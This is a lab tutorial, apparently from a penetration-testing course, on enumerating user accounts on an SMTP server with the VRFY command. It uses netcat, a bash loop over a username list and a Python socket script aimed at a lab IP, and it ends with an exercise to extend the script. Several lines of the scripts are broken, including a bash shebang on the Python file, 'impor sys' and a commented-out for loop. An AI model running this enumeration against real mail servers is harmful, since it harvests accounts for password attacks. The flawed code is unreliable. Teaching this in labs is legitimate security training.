|
EXPLOITING SMTP
====================================================================
SMTP ENUMERATION: ACTIVE INFORMATION GATHERING:
====================================================================
////////////////////////////////////////////////////////
//// MAIL SERVERS ARE THE TARGETS IN THE LABS HERE /////
////////////////////////////////////////////////////////
Python scripting:
Under certain misconfiguration mail servers can also be used to gather information about a host or network.
SMTP supports several interestngverbs. Including:
- expn
- vrfy - verify
Both divulge information about users configured on that server.
These verbs can often be abused by a hacker to verify existing users on a mail server which can aid the attacker later, such as in a password brute force attack.
Below, I connect to port 25 in a mail server in our labs known to have this enumeration vulnerability.
#nc -nv 192.168.31.215 25
The SMTP service replies with a banner which identifies it as a send mail 8 server.
Once connected we can try the VRFY command to verify the existence of a user called bob on the system.
#VRFY bob
Now we will verify the response for a user that does not exist:
#VRFY idontexist
notice the difference in the SMTP reponses. This is greppable - a 250 server response when successful, and 550 when not successful.
SMTP ENUMERATION: ACTIVE INFORMATION GATHERING: SMTP VRFY Bash Script
////////////////////////////////////////////////////////
//// MAIL SERVERS ARE THE TARGETS IN THE LABS HERE /////
////////////////////////////////////////////////////////
A list of users in users.txt
root
backup
bob
dick
david
harry
apache
igor
ron
mike
harry
joseph
In a real world scenario, this list of users would be filled with information found in the user information gathering stage.
Automatically connect to the SMTP server on port 25 and issue the VRFY command for each users in users.txt
#for user in $(cat users.txt); do echo VRFY $user |nc -nv -w 1 192.168.31.215 2>/dev/null |grep ^"250";done
In a script:
----------------------------------------------
#!/bin/bash
#for user in $(cat users.txt); do
echo VRFY $user |nc -nv -w 1 192.168.31.215 2>/dev/null |grep ^"250";
done
------------------------------------------------
SMTP ENUMERATION: ACTIVE INFORMATION GATHERING: SMTP VRFY Python Port
////////////////////////////////////////////////////////
//// MAIL SERVERS ARE THE TARGETS IN THE LABS HERE /////
////////////////////////////////////////////////////////
-------------------------------------------------------
#!/bin/bash
import socket
impor sys
if len(sys.argv) != 2;
print "Usage: vrfy.py "
sys.exit(0)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Create a Socket
connect=s.connect(('192.168.31.215',25)) #Connect to the Server
banner=s.recv(1024) #Receive the banner
print banner
s.send('VRFY ' + sys.argv[1] + '\r\n') #VRFY a user
result=s.recv(1024)
print result
s.close() #Close the socket
--------------------------------------------------------
***************************************
***************************************
***************************************
***************************************
***************************************
EXERCISE HERE:
Complete porting the script so that the script will users a txt list of usernames as input.
Eg. When the script runs, I want to be able to give it a file name instead of a username.
***************************************
***************************************
***************************************
***************************************
***************************************
This same type of check for information via brute force methods can also be applied elsewhere where output is overly verbose. This type of information should not be passed.
|
|
|
|
